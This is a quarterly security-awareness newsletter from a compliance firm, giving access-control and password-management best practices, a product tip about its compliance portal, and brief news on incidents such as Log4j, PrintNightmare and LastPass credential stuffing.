TCT is committed to helping you keep your organization secure and compliant. Every quarter, we publish compliance and security insights that you can share with your employees to fulfill periodic security reminder requirements your organization may be subject to.
As an added bonus, we’ve highlighted some developing security trends and featured a quick tip to get more out of your compliance management.
Access Control and Password Management Best Practices
Password management is a critical part of your company’s security, and it involves more than keeping an updated list of your employees. If you don’t stay on top of the access control for those with access, you’ll end up with a rat’s nest of permissions that people should never have access to — including the possibility of those who should not have access possibly getting into your systems.
Most compliance standards require sound access control and password management. No matter what compliance framework you’re using, follow these best practices to keep your company safe.
Create password management policies and processes for any possible scenario when someone needs a change in their access. For example:
- New hire (access addition)
- New role in the company (access change)
- Termination of employment (access removal)
Any request for a change to access must come from authorized management — no one should be able to request new access for themselves. The request should denote what systems and what levels of access are needed for the individual. Validate that they actually end up with the proper permissions, as requested. Never give anyone more access than absolutely necessary.
When setting up a new password, securely give the user their initial password. Make sure they immediately change their password by automatically requiring a password change the first time they log in. You don’t want someone in IT knowing the password for others in the organization — no one in your company should know anyone else’s passwords.
When roles change and new permissions are needed, be sure to sundown any permissions that are no longer needed. You don’t want people to accumulate greater and greater levels of permission that they don’t need. Make sure you keep permissions only to what’s required. Employees shouldn’t have access to information they don’t need to have — such as customer Sensitive Data. And if their password gets hacked, you’ll limit the data that’s been exposed.
When people leave your company, sundown their permissions immediately. If they’re being terminated, their permissions should be removed while they are receiving the news. Most people would never do anything nefarious, but this policy avoids the one person out of 100 who would attempt to misuse their access. Track each employee’s provisioning and access, so that you know exactly what needs to be shut down when they leave.
You could have a lot of access changes in the course of a year, and it’s easy for some details to slip through the cracks. Most compliance standards require a quarterly pulse check to ensure that all the accounts are correct with the right permissions. Make sure you’ve shut down everything that should be shut down and that no one has unneeded permissions.
Quick Tip: Customize Your Directional Compliance Criteria
If you’re following a directional standard like HIPAA, SOC 2, or CCPA, TCT Portal solves a common problem you’re probably facing. On the one hand, it’s nice to have the flexibility to determine the controls that work best for you — but now you have to document exactly what they are, how you’ll accomplish them, and how to test their effectiveness.
The controls you establish need to be granular enough that the Assessor can test what you’re doing. Documenting the controls for directional standards can be a challenge to manage. Typically, you have to document your controls and the validation tests in detailed notes. But TCT Portal gives you a flexible, streamlined option.
TCT Portal lets you define your control objectives (the requirements that are to be met) and then define how to test them — within the compliance management tool itself. This functionality introduces significant flexibility to customize directional standards to fit your unique organization. It increases TCT Portal’s effectiveness for you and maximizes your collaboration with Assessors.
This feature also gives you the flexibility to create a tracking mechanism that you can use alongside all of your other industry standard certifications. For directional standards, you can define all of the control and testing elements. And you can take a very prescriptive certification, such as PCI, and use the same compliance management tool to accomplish those compliance objectives.
What’s Going on in Security Today
Log4j is one of the biggest vulnerabilities ever discovered. Nearly 40% of all corporate networks have this vulnerability in some capacity. With Log4j being open-source, it is the focal point of attacks on modern infrastructure. The average application nowadays uses 528 open-source components. This was a remote code execution vulnerability, meaning once exploited, the attackers could run code remotely on impacted systems. Within 24 hours of the original vulnerability, over 60 new variations were already introduced. Log4j makes Covid look like a slow-moving virus. The attackers can insert code into log messages that load the code.
A rootkit has been discovered, specifically targeting HP’s Integrated Lights-Out management technology. This rootkit messes with the firmware modules, effectively wiping data off of targeted and infected symptoms. The iLo modules can access firmware, hardware, software, and operating system of infected systems. This makes this rootkit an attacker’s job of infecting HP servers that much easier, so an ideal candidate to try and exploit.
Microsoft patched 881 vulnerabilities this year. This is fewer than last year, but still a high number. There was the exchange server vulnerabilities early in the year, most notably exploited by Hafnium, a state-sponsored Chinese hacking organization. Then there was the Print Spooler vulnerability called PrintNightmare, which was a remotely executed bug that could be exploited by an authenticated user account, to gain system level access on affected systems, allowing them to remotely execute code.
There have been recent findings at LastPass of a credential-stuffing attack. LastPass is a password management tool owned by LogMeIn. Essentially a user remembers one login, and once access is granted, the rest of your usernames and passwords are copied/pasted into appropriate websites. LastPass is urging users to use complicated “Master Passwords” to unlock their password database. Credential-Stuffing attacks are where lists of usernames and passwords are used to gain access to user accounts through large-scale, automated login requests against applications.
Garrett walk-through Metal Detectors allow remote attacks. The PD 6500i and MZ 6100 models, when exploited, allowed for remote access, and the ability to execute malicious commands. The attacker could change sensitivity levels to ultra-high or non-existent, potentially allowing dangerous items beyond the intended stopping point, the metal detector. This could create physical malice, through virtual manipulation.